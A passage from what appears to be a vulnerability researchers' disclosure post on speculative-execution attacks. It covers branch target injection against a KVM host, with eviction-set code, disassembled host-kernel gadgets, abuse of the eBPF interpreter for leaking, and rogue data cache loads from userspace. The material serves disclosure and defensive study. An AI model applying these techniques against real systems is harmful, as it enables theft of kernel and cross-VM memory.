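static int set_of(int page) { return page % SETS; } /* stand-in for the unknown mapping */

/* Idealized eviction test over the candidate subset in[]. */
static int evicts(const char *in, int victim) {
    int hits = 0;
    for (int i = 0; i < NPAGES; i++)
        if (in[i] && set_of(i) == set_of(victim))
            hits++;
    return hits >= WAYS;
}

/* Drop each candidate in turn; keep it dropped if the rest still evicts
 * the victim. What remains is a minimal eviction set. */
int reduce(char *in, int victim) {
    for (int i = 0; i < NPAGES; i++) {
        if (!in[i]) continue;
        in[i] = 0;
        if (!evicts(in, victim))
            in[i] = 1; /* this line was needed, put it back */
    }
    int size = 0;
    for (int i = 0; i < NPAGES; i++) size += in[i];
    return size;
}
```

Starting from all pages, the reduction converges to exactly WAYS lines, all in the victim's cache set.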
Locating the host-virtual address of a guest page
Because this attack uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of one guest page. Alternative approaches such as PRIME+PROBE should work without that requirement.

The basic idea for this step of the attack is to use a branch target injection attack against the hypervisor to load an attacker-controlled address and test whether that caused the guest-owned page to be loaded. For this, a gadget that simply loads from the memory location specified by R8 can be used - R8-R11 still contain guest-controlled values when the first indirect call after a guest exit is reached on this kernel build.

We expected that an attacker would need to either know which eviction set has to be used at this point or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed behavior is actually the result of L1D and L2 evictions, which might be sufficient to permit a few instructions worth of speculative execution.

The host kernel maps (nearly?) all physical memory in the physmap area, including memory assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), in an area of size 128PiB. Therefore, directly bruteforcing the host-virtual address of a guest page would take a long time. It is not necessarily impossible; as a ballpark estimate, it should be possible within a day or so, maybe less, assuming 12000 successful injections per second and 30 guest pages that are tested in parallel; but not as impressive as doing it in a few minutes.

To optimize this, the problem can be split up: First, brute-force the physical address using a gadget that can load from physical addresses, then brute-force the base address of the physmap region. Because the physical address can usually be assumed to be far below 128PiB, it can be brute-forced more efficiently, and brute-forcing the base address of the physmap region afterwards is also easier because then address guesses with 1GiB alignment can be used.

To brute-force the physical address, the following gadget can be used:

ffffffff810a9def: 4c 89 c0 mov rax,r8
ffffffff810a9df2: 4d 63 f9 movsxd r15,r9d
ffffffff810a9df5: 4e 8b 04 fd c0 b3 a6 mov r8,QWORD PTR [r15*8-0x7e594c40]
ffffffff810a9dfc: 81
ffffffff810a9dfd: 4a 8d 3c 00 lea rdi,[rax+r8*1]
ffffffff810a9e01: 4d 8b a4 00 f8 00 00 mov r12,QWORD PTR [r8+rax*1+0xf8]
ffffffff810a9e08: 00

This gadget permits loading an 8-byte-aligned value from the area around the kernel text section by setting R9 appropriately, which in particular permits loading page_offset_base, the start address of the physmap. Then, the value that was originally in R8 - the physical address guess minus 0xf8 - is added to the result of the previous load, 0xf8 is added to it, and the result is dereferenced.
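In C, the address computation that the gadget performs speculatively looks like this (a model, with the first load assumed to fetch page_offset_base; register names follow the disassembly):

```c
#include <assert.h>
#include <stdint.h>

/* Model of the speculative address computation: the 0xf8 subtracted by
 * the attacker cancels against the 0xf8 displacement of the final load,
 * so the dereferenced address is physmap base + physical address guess. */
uint64_t gadget_load_address(uint64_t page_offset_base, uint64_t phys_guess) {
    uint64_t r8  = phys_guess - 0xf8;      /* attacker-controlled R8 */
    uint64_t rax = r8;                     /* mov rax, r8 */
    uint64_t r8_loaded = page_offset_base; /* mov r8, [r15*8 - 0x7e594c40] */
    return r8_loaded + rax + 0xf8;         /* mov r12, [r8 + rax*1 + 0xf8] */
}
```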
Cache set selection
To select the correct L3 eviction set, the attack from the following section is essentially executed with different eviction sets until it works.
Leaking data
At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel - while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel's text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.

The eBPF interpreter entry point has the following function signature:

static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)

The second parameter is a pointer to an array of statically pre-verified eBPF instructions to be executed - which means that __bpf_prog_run() will not perform any type checks or bounds checks. The first parameter is simply stored as part of the initial emulated register state, so its value doesn't matter.

The eBPF interpreter provides, among other things:

multiple emulated 64-bit registers
64-bit immediate writes to emulated registers
memory reads from addresses stored in emulated registers
bitwise operations (including bit shifts) and arithmetic operations

To call the interpreter entry point, a gadget that gives RSI and RIP control given R8-R11 control and controlled data at a known memory location is necessary. The following gadget provides this functionality:

ffffffff81514edd: 4c 89 ce mov rsi,r9
ffffffff81514ee0: 41 ff 90 b0 00 00 00 call QWORD PTR [r8+0xb0]

Now, by pointing R8 and R9 at the mapping of a guest-owned page in the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode in the host kernel. Then, relatively straightforward bytecode can be used to leak data into the cache.
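A minimal model of what such leak bytecode computes, written in C rather than eBPF instructions (the offsets and names are illustrative): one bit of a value read from an attacker-chosen address is masked out and turned into one of two distinct loads in a guest-owned page, which FLUSH+RELOAD can then distinguish.

```c
#include <assert.h>
#include <stdint.h>

/* Which address the speculative eBPF program touches: bit `bit` of the
 * secret selects one of two cache lines inside a guest-owned page. */
uint64_t probe_address(uint64_t secret, int bit, uint64_t guest_page) {
    uint64_t b = (secret >> bit) & 1;  /* bitwise ops on emulated registers */
    return guest_page + b * 0x400;     /* two cache lines, 0x400 bytes apart */
}
```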
Variant 3: Rogue data cache load
Basically, read Anders Fogh's blogpost: https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/

In summary, an attack using this variant of the issue attempts to read kernel memory from userspace without misdirecting the control flow of kernel code. This works by using the code pattern that was used for the previous variants, but in userspace. The underlying idea is that the permission check for accessing an address might not be on the critical path for reading data from memory to a register, where the permission check could have significant performance impact. Instead, the memory read could make the result of the read available to following instructions immediately and only perform the permission check asynchronously, setting a flag in the reorder buffer that causes an exception to be raised if the permission check fails.
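The pattern can be sketched as follows with a probe array of one page per possible byte value. Executed against an actual kernel address this faults architecturally; in the attack, the access sits behind fault suppression or a mispredicted branch so that only the speculative load and its cache footprint survive (and it does not work on mitigated CPUs):

```c
#include <assert.h>

/* One page per possible byte value; after the (speculative) read, the
 * value-dependent page can be identified with FLUSH+RELOAD. */
static unsigned char probe[256 * 4096];

unsigned char touch_probe(const unsigned char *addr) {
    unsigned char value = *addr; /* the (speculative) privileged read */
    return probe[value * 4096];  /* leaves a value-dependent cache footprint */
}
```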

We do have a few additions to make to Anders Fogh's blogpost:

"Imagine the following instruction executed in usermode
mov rax,[somekernelmodeaddress]
It will cause an interrupt when retired, [...]"

It is also possible to already execute that instruction behind a high-latency mispredicted branch to avoid taking a page fault. This might also widen the speculation window by increasing the delay between the read from a kernel address and delivery of the associated exception.

"First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1."

When we used prefetch instructions after doing a syscall, the attack stopped working for us, and we have no clue why. Perhaps the CPU somehow stores whether access was denied on the last access and prevents the attack from working if that is the case?

"Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed."

That (read from kernel address returns all-zeroes) seems to happen for memory that is not sufficiently cached but for which pagetable entries are present, at least after repeated read attempts. For unmapped memory, the kernel address read does not return a result at all.
Ideas for further research
We believe that our research provides many remaining research topics that we have not yet investigated, and we encourage other public researchers to look into these.
This section contains an even higher amount of speculation than the rest of this blogpost - it contains untested ideas that might well be useless.
Leaking without data cache timing
It would be interesting to explore whether there are microarchitectural attacks other than measuring data cache timing that can be used for exfiltrating data out of speculative execution.
Other microarchitectures
Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked.
Other JIT engines
We developed a successful variant 1 attack against the JIT engine built into the Linux kernel. It would be interesting to see whether attacks against more advanced JIT engines with less control over the system are also practical - in particular, JavaScript engines.
More efficient scanning for host-virtual addresses and cache sets
In variant 2, while scanning for the host-virtual address of a guest-owned page, it might make sense to attempt to determine its L3 cache set first. This could be done by performing L3 evictions using an eviction pattern through the physmap, then testing whether the eviction affected the guest-owned page.

The same might work for cache sets - use an L1D+L2 eviction set to evict the function pointer in the host kernel context, use a gadget in the kernel to evict an L3 set using physical addresses, then use that to identify which cache sets guest lines belong to until a guest-owned eviction set has been constructed.
Dumping the complete BTB state
Given that the generic BTB seems to only be able to distinguish 2^(31-8) or fewer source addresses, it seems feasible to dump out the complete BTB state generated by e.g. a hypercall in a timeframe around the order of a few hours. (Scan for jump sources, then for every discovered jump source, bisect the jump target.) This could potentially be used to identify the locations of functions in the host kernel even if the host kernel is custom-built.

The source address aliasing would reduce the usefulness somewhat, but because target addresses don't suffer from that, it might be possible to correlate (source,target) pairs from machines with different KASLR offsets and reduce the number of candidate addresses based on KASLR being additive while aliasing is bitwise.

This could then potentially allow an attacker to make guesses about the host kernel version or the compiler used to build it based on jump offsets or distances between functions.
Variant 2: Leaking with more efficient gadgets
If sufficiently efficient gadgets are used for variant 2, it might not be necessary to evict host kernel function pointers from the L3 cache at all; it might be sufficient to only evict them from L1D and L2.
Various speedups
In particular the variant 2 PoC is still a bit slow. This is probably partly because:

It only leaks one bit at a time; leaking more bits at a time should be doable.
It heavily uses IRETQ for hiding control flow from the processor.

It would be interesting to see what data leak rate can be achieved using variant 2.
Leaking or injection through the return predictor
If the return predictor also doesn't lose its state on a privilege level change, it might be useful for either locating the host kernel from inside a VM (in which case bisection could be used to very quickly discover the full address of the host kernel) or injecting return targets (in particular if the return address is stored in a cache line that can be flushed out by the attacker and isn't reloaded before the return instruction).

However, we have not performed any experiments with the return predictor that yielded conclusive results so far.
Leaking data out of the indirect call predictor
We have attempted to leak target information out of the indirect call predictor, but haven't been able to make it work.
Vendor statements
The following statements were provided to us regarding this issue by the vendors to whom Project Zero disclosed this vulnerability:
Intel
No current statement provided at this time.
AMD
AMD provided the following link: http://www.amd.com/en/corporate/speculative-execution
ARM
Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog. Correspondingly, Arm has developed software mitigations that we recommend be deployed.

Specific details regarding the affected processors and mitigations can be found at this website: https://developer.arm.com/support/security-update

Arm has included a detailed technical whitepaper as well as links to information from some of Arm’s architecture partners regarding their specific implementations and mitigations.
Literature
Note that some of these documents - in particular Intel's documentation - change over time, so quotes from and references to it may not reflect the latest version of Intel's documentation.

https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel's optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:
"Placing data immediately following an indirect branch can cause a performance problem. If the data consists of all zeros, it looks like a long stream of ADDs to memory destinations and this can cause resource conflicts and slow down branch recovery. Also, data immediately following indirect branches may appear as branches to the branch predication [sic] hardware, which can branch off to execute other data pages. This can lead to subsequent self-modifying code problems."
"Loads can:[...]Be carried out speculatively, before preceding branches are resolved."
"Software should avoid writing to a code page in the same 1-KByte subpage that is being executed or fetching code in the same 2-KByte subpage of that is being written. In addition, sharing a page containing directly or speculatively executed code with another processor as a data page can trigger an SMC condition that causes the entire pipeline of the machine and the trace cache to be cleared. This is due to the self-modifying code condition."
"if mapped as WB or WT, there is a potential for speculative processor reads to bring the data into the caches"
"Failure to map the region as WC may allow the line to be speculatively read into the processor caches (via the wrong path of a mispredicted branch)."
https://software.intel.com/en-us/articles/intel-sdm: Intel's Software Developer Manuals
http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog's documentation of reverse-engineered processor behavior and relevant theory was very helpful for this research.
http://www.cs.binghamton.edu/~dima/micro16.pdf and https://github.com/felixwilhelm/mario_baslr: Prior research by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh on abusing branch target buffer behavior to leak addresses that we used as a starting point for analyzing the branch prediction of Haswell processors. Felix Wilhelm's research based on this provided the basic idea behind variant 2.
https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js research by Daniel Gruss, Clémentine Maurice and Stefan Mangard contains information about L3 cache eviction patterns that we reused in the KVM PoC to evict a function pointer.
https://xania.org/201602/bpu-part-one: Matt Godbolt blogged about reverse-engineering the structure of the branch predictor on Intel processors.
https://www.sophia.re/thesis.pdf: Sophia D'Antoine wrote a thesis that shows that opcode scheduling can theoretically be used to transmit data between hyperthreads.
https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard wrote a paper on mitigating microarchitectural issues caused by pagetable sharing between userspace and the kernel.
https://www.jilp.org/: This journal contains many articles on branch prediction.
http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost by Henry Wong investigates the L3 cache replacement policy used by Intel's Ivy Bridge architecture.